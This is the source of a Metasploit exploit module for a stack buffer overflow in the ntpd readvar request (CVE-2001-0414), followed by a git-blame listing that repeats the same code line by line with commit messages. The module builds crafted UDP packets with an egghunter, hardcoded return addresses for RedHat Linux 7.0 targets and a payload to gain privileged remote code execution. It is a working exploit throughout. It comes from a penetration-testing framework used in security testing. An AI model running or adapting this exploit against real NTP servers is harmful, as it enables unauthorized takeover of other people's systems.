modules/exploits/multi/ntp/ntp_overflow.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NTP Daemon readvar Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack based buffer overflow in the
        ntpd and xntpd service. By sending an overly long 'readvar'
        request it is possible to execute code remotely. As the stack
        is corrupted, this module uses the Egghunter technique.
      },
      'Author'         => 'aushack',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
            [ 'CVE', '2001-0414' ],
            [ 'OSVDB', '805' ],
            [ 'BID', '2540' ],
            [ 'US-CERT-VU', '970472' ],
        ],
      'Payload'        =>
        {
          'Space'    => 220,
          'BadChars' => "\x00\x01\x02\x16,=",
          'StackAdjustment' => -3500,
          'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)
          'Compat'   =>
          {
            'ConnectionType' => '-reverse',
          },
        },
      'Platform'       => [ 'linux' ],
      'Arch'		 => [ ARCH_X86 ],
      'Targets'        =>
        [
            [ 'RedHat Linux 7.0 ntpd 4.0.99j', 		{ 'Ret' => 0xbffffbb0 } ],
            [ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', 	{ 'Ret' => 0xbffff980 } ],
            [ 'RedHat Linux 7.0 ntpd 4.0.99k', 		{ 'Ret' => 0xbffffbb0 } ],
            #[ 'FreeBSD 4.2-STABLE', 			{ 'Ret' => 0xbfbff8bc } ],
            [ 'Debugging', 					{ 'Ret' => 0xdeadbeef } ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2001-04-04',
      'DefaultTarget' => 0))

    register_options([Opt::RPORT(123)])
  end

  def exploit

    hunter  = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
    egg     = hunter[1]

    connect_udp

    pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="
    pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"

    sploit =  pkt1 + make_nops(512 - pkt1.length)
    sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V')
    sploit[(224 + pkt1.length), hunter[0].length] = hunter[0]

    print_status("Trying target #{target.name}...")

    print_status("Sending hunter")
    udp_sock.put(sploit)
    select(nil,nil,nil,0.5)

    print_status("Sending payload")
    udp_sock.put(pkt1 + egg)
    select(nil,nil,nil,0.5)

    print_status("Calling overflow trigger")
    udp_sock.put(pkt2)
    select(nil,nil,nil,0.5)

    handler
    disconnect_udp

  end
end
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GoodRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Udp`
			`include Msf::Exploit::Remote::Egghunter`
Retab modules 2013-08-30 16:28:54 -05:00
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
Fix caps on module titles (first pass) 2013-11-15 00:03:42 -06:00			`'Name' => 'NTP Daemon readvar Buffer Overflow',`
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`'Description' => %q{`
			`This module exploits a stack based buffer overflow in the`
			`ntpd and xntpd service. By sending an overly long 'readvar'`
			`request it is possible to execute code remotely. As the stack`
			`is corrupted, this module uses the Egghunter technique.`
			`},`
Change author name to nick. 2017-11-09 03:00:24 +11:00			`'Author' => 'aushack',`
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`'License' => MSF_LICENSE,`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'References' =>`
			`[`
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`[ 'CVE', '2001-0414' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '805' ],`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`[ 'BID', '2540' ],`
switch some URL references to US-CERT-VU type 2010-07-03 01:09:32 +00:00			`[ 'US-CERT-VU', '970472' ],`
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`],`
			`'Payload' =>`
			`{`
			`'Space' => 220,`
			`'BadChars' => "\x00\x01\x02\x16,=",`
			`'StackAdjustment' => -3500,`
			`'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Compat' =>`
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`{`
			`'ConnectionType' => '-reverse',`
			`},`
			`},`
			`'Platform' => [ 'linux' ],`
			`'Arch' => [ ARCH_X86 ],`
			`'Targets' =>`
			`[`
			`[ 'RedHat Linux 7.0 ntpd 4.0.99j', { 'Ret' => 0xbffffbb0 } ],`
			`[ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', { 'Ret' => 0xbffff980 } ],`
			`[ 'RedHat Linux 7.0 ntpd 4.0.99k', { 'Ret' => 0xbffffbb0 } ],`
			`#[ 'FreeBSD 4.2-STABLE', { 'Ret' => 0xbfbff8bc } ],`
			`[ 'Debugging', { 'Ret' => 0xdeadbeef } ],`
			`],`
			`'Privileged' => true,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2001-04-04',`
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`'DefaultTarget' => 0))`
Retab modules 2013-08-30 16:28:54 -05:00
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options([Opt::RPORT(123)])`
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`def exploit`
Retab modules 2013-08-30 16:28:54 -05:00
see #684 , adds checksum support, updates modules to use it, fixes some wfs_delay/WfsDelay issues 2010-08-25 20:55:37 +00:00			`hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })`
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`egg = hunter[1]`
Retab modules 2013-08-30 16:28:54 -05:00
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`connect_udp`
Retab modules 2013-08-30 16:28:54 -05:00
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="`
			`pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"`
Retab modules 2013-08-30 16:28:54 -05:00
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`sploit = pkt1 + make_nops(512 - pkt1.length)`
			`sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V')`
			`sploit[(224 + pkt1.length), hunter[0].length] = hunter[0]`
Retab modules 2013-08-30 16:28:54 -05:00
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`print_status("Trying target #{target.name}...")`
Retab modules 2013-08-30 16:28:54 -05:00
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`print_status("Sending hunter")`
			`udp_sock.put(sploit)`
Fixes #2134 . Subs select for sleep in exploit modules. 2010-06-22 19:11:05 +00:00			`select(nil,nil,nil,0.5)`
Retab modules 2013-08-30 16:28:54 -05:00
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`print_status("Sending payload")`
see #684 , adds checksum support, updates modules to use it, fixes some wfs_delay/WfsDelay issues 2010-08-25 20:55:37 +00:00			`udp_sock.put(pkt1 + egg)`
Fixes #2134 . Subs select for sleep in exploit modules. 2010-06-22 19:11:05 +00:00			`select(nil,nil,nil,0.5)`
Retab modules 2013-08-30 16:28:54 -05:00
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`print_status("Calling overflow trigger")`
			`udp_sock.put(pkt2)`
Fixes #2134 . Subs select for sleep in exploit modules. 2010-06-22 19:11:05 +00:00			`select(nil,nil,nil,0.5)`
Retab modules 2013-08-30 16:28:54 -05:00
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`handler`
			`disconnect_udp`
Retab modules 2013-08-30 16:28:54 -05:00
Added ntp module, linux egghunter 2008-05-12 14:49:45 +00:00			`end`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`end`